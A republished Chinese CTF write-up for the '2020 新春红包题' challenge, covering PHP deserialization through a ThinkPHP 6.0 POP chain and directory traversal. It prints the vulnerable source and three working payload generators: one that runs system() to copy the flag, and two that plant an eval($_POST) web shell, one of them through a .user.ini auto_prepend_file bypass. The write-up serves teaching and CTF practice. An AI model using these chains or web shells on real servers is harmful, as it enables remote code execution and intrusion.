[2020 新春红包题]1

Posted H3rmesk1t

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[2020 新春红包题]1相关的知识,希望对你有一定的参考价值。

[2020 新春红包题]1

考点

php反序列化、ThinkPHP6.0POC链、目录穿越

思路

根据hint的内容传参?src=1得到源码
解法一:直接写命令,生成flag文件
解法二:对于前面的随机值,使用/…/即可截断,时间戳将会被认为一个目录,后面即可追加写任意文件
解法三:先可以利用跨目录,这样就可以不去爆破文件名,再利用.user.ini绕过后缀名限制

Payload

传参得到的源码

<?php
error_reporting(0);

class A {

    protected $store;

    protected $key;

    protected $expire;

    public function __construct($store, $key = 'flysystem', $expire = null) {
        $this->key = $key;
        $this->store = $store;
        $this->expire = $expire;
    }

    public function cleanContents(array $contents) {
        $cachedProperties = array_flip([
            'path', 'dirname', 'basename', 'extension', 'filename',
            'size', 'mimetype', 'visibility', 'timestamp', 'type',
        ]);

        foreach ($contents as $path => $object) {
            if (is_array($object)) {
                $contents[$path] = array_intersect_key($object, $cachedProperties);
            }
        }

        return $contents;
    }

    public function getForStorage() {
        $cleaned = $this->cleanContents($this->cache);

        return json_encode([$cleaned, $this->complete]);
    }

    public function save() {
        $contents = $this->getForStorage();

        $this->store->set($this->key, $contents, $this->expire);
    }

    public function __destruct() {
        if (!$this->autosave) {
            $this->save();
        }
    }
}

class B {

    protected function getExpireTime($expire): int {
        return (int) $expire;
    }

    public function getCacheKey(string $name): string {
        // 使缓存文件名随机
        $cache_filename = $this->options['prefix'] . uniqid() . $name;
        if(substr($cache_filename, -strlen('.php')) === '.php') {
          die('?');
        }
        return $cache_filename;
    }

    protected function serialize($data): string {
        if (is_numeric($data)) {
            return (string) $data;
        }

        $serialize = $this->options['serialize'];

        return $serialize($data);
    }

    public function set($name, $value, $expire = null): bool{
        $this->writeTimes++;

        if (is_null($expire)) {
            $expire = $this->options['expire'];
        }

        $expire = $this->getExpireTime($expire);
        $filename = $this->getCacheKey($name);

        $dir = dirname($filename);

        if (!is_dir($dir)) {
            try {
                mkdir($dir, 0755, true);
            } catch (\\Exception $e) {
                // 创建失败
            }
        }

        $data = $this->serialize($value);

        if ($this->options['data_compress'] && function_exists('gzcompress')) {
            //数据压缩
            $data = gzcompress($data, 3);
        }

        $data = "<?php\\n//" . sprintf('%012d', $expire) . "\\n exit();?>\\n" . $data;
        $result = file_put_contents($filename, $data);

        if ($result) {
            return $filename;
        }

        return null;
    }

}

if (isset($_GET['src']))
{
    highlight_file(__FILE__);
}

$dir = "uploads/";

if (!is_dir($dir))
{
    mkdir($dir);
}
unserialize($_GET["data"]);

解法一:
首先autosave要为0,$testB->options['serialize']要为system函数,此时我们对最后的写文件没什莫要求了,但必须要执行到$data = $this->serialize($value);这步,$testA->cache要为system要执行的命令

<?php
class A{
    protected $store;
    protected $key;
    protected $expire;
    public $cache = [];
    public $complete = true;
    public function __construct () {
        $this->store = new B();
        $this->key = '/../wtz.phtml';
        $this->cache = ['path'=>'a','dirname'=>'`cat /flag > ./uploads/flag.php`'];
    }
}
class B{
    public $options = [
        'serialize' => 'system',
        'prefix' => 'sssss',
    ];
}
echo urlencode(serialize(new A()));

解法二:

$b = new B();
$b -> options = array('serialize' => "base64_decode", 
                      'data_compress' => false,
                      'prefix' => "php://filter/write=convert.base64-decode/resource=uploads/");
$a = new A($store = $b, $key = "/../a.php/.", $expire = 0);
$a->autosave = false;
$a->cache = array();
$a->complete = base64_encode('qaq'.base64_encode('<?php @eval($_POST["s"]);?>'));
echo urlencode(serialize($a));

解法三:
先上传图片马,再上传.use.ini

$b = new B();
$b->writeTimes = 0;
$b -> options = array('serialize' => "base64_decode", 
                      'data_compress' => false,
                      'prefix' => "php://filter/write=convert.base64-decode/resource=uploads/moyu");

$a = new A($store = $b, $key = "/../../aaaaaa.jpg", $expire = 0);
$a->autosave = false;
$a->cache = array();
$a->complete = base64_encode('qaq'.base64_encode('<?php @eval($_POST["moyu"]);?>'));

echo urlencode(serialize($a));
$b = new B();
$b->writeTimes = 0;
$b -> options = array('serialize' => "base64_decode", 
                      'data_compress' => false,
                      'prefix' => "php://filter/write=convert.base64-decode/resource=uploads/moyu");

$a = new A($store = $b, $key = "/../../.user.ini", $expire = 0);
$a->autosave = false;
$a->cache = array();
$a->complete = base64_encode('qaq'.base64_encode("\\nauto_prepend_file=aaaaaa.jpg"));

echo urlencode(serialize($a));

以上是关于[2020 新春红包题]1的主要内容,如果未能解决你的问题,请参考以下文章

[2020 新春红包题]1

新春限定:新红包封面项目

新春快乐,红包奉上

AI红包皮速领,人类现金速抽|祝大家新春快乐

开工了!领红包

无极·协同 | 2020年捷配新春团拜会圆满举行